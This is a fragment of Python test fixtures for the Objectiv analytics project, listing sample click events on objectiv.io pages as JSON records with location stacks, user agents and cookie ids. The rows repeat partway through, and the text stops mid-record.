    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac302','2021-11-30','2021-11-30 10:23:36.290','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "location-stack", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-location-stack", "text": "Docs - Location Stack", "href": "/docs/taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "1049e11c-bb9c-4b84-9dac-b4125998999d", "time": 1636475896879, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac303','2021-11-30','2021-11-30 10:23:36.291','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "header", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-repo-button", "text": "Objectiv on GitHub", "href": "https://github.com/objectiv/objectiv-analytics", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd8239de-032f-499a-9849-8e97214ecdf1", "time": 1636475880112, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac304','2021-11-30','2021-11-30 10:23:36.267','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/modeling/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "LinkContext", "id": "notebook-product-analytics", "text": "sandboxed notebook", "href": "https://notebook.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "a789d8fe-5cd9-4ff0-9780-a56cf094b62a", "time": 1636475922156, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac305','2021-12-01','2021-12-01 10:23:36.276','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "67cbfc73-b8bd-40f6-aa8e-88cb73857d09", "time": 1636475947689, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac306','2021-12-01','2021-12-01 10:23:36.279','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Contact Us", "text": "Contact Us", "href": "mailto:hi@objectiv.io", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "899c18aa-a908-43f9-9827-d4b9072205ea", "time": 1636475983057, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac307','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/jobs", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "footer", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Cookies", "text": "Cookies", "href": "/privacy/cookies", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "837ae9db-497c-4925-a4c9-b2183bd3056b", "time": 1636476007981, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac308','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "ExpandableSectionContext", "id": "The Project", "_types": ["AbstractContext", "AbstractLocationContext", "ExpandableSectionContext", "SectionContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "5835d00e-4099-44cc-9191-8baccc2d32fa", "time": 1636476074003, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac309','2021-12-02','2021-12-02 14:23:36.282','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "cookie_id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "690ada97-c0fa-4378-9c04-bd1f7753505a", "time": 1636476111218, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac310','2021-12-03','2021-12-03 10:23:36.283','b2df75d2-d7ca-48ac-9747-af47d7a4a2b4','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/about", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Docs", "text": "Docs", "href": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 10; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "cookie_id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "089ff754-35d6-49da-bb32-dc9031b10289", "time": 1636476142139, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac311','2021-11-29','2021-11-29 10:23:36.286','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-taxonomy", "text": "Docs - Taxonomy", "href": "/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd54aa9a-b8b8-4feb-968d-8fa9f736c596", "time": 1636476191693, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac312','2021-11-29','2021-11-29 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "logo", "text": "Objectiv Documentation Logo", "href": "/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "e2445152-327a-466f-a2bf-116f0146ab7a", "time": 1636476196460, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}')
]
_TEST_DATA_OBJECTIV_COLUMN_NAMES = ['event_id', 'day', 'moment', 'cookie_id', 'value'] | TEST_DATA_OBJECTIV = [
('12b55ed5-4295-4fc1-bf1f-88d64d1ac301','2021-11-30','2021-11-30 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "GitHub", "text": "GitHub", "href": "https://github.com/objectiv", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "729c84f9-91d0-4f9f-be58-5cfb2d8130e4", "time": 1636476263115, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac302','2021-11-30','2021-11-30 10:23:36.290','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "location-stack", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-location-stack", "text": "Docs - Location Stack", "href": "/docs/taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "1049e11c-bb9c-4b84-9dac-b4125998999d", "time": 1636475896879, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac303','2021-11-30','2021-11-30 10:23:36.291','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "header", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-repo-button", "text": "Objectiv on GitHub", "href": "https://github.com/objectiv/objectiv-analytics", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd8239de-032f-499a-9849-8e97214ecdf1", "time": 1636475880112, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac304','2021-11-30','2021-11-30 10:23:36.267','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/modeling/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "LinkContext", "id": "notebook-product-analytics", "text": "sandboxed notebook", "href": "https://notebook.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "a789d8fe-5cd9-4ff0-9780-a56cf094b62a", "time": 1636475922156, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac305','2021-12-01','2021-12-01 10:23:36.276','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "67cbfc73-b8bd-40f6-aa8e-88cb73857d09", "time": 1636475947689, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac306','2021-12-01','2021-12-01 10:23:36.279','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Contact Us", "text": "Contact Us", "href": "mailto:hi@objectiv.io", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "899c18aa-a908-43f9-9827-d4b9072205ea", "time": 1636475983057, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac307','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/jobs", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "footer", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Cookies", "text": "Cookies", "href": "/privacy/cookies", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "837ae9db-497c-4925-a4c9-b2183bd3056b", "time": 1636476007981, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac308','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "ExpandableSectionContext", "id": "The Project", "_types": ["AbstractContext", "AbstractLocationContext", "ExpandableSectionContext", "SectionContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": 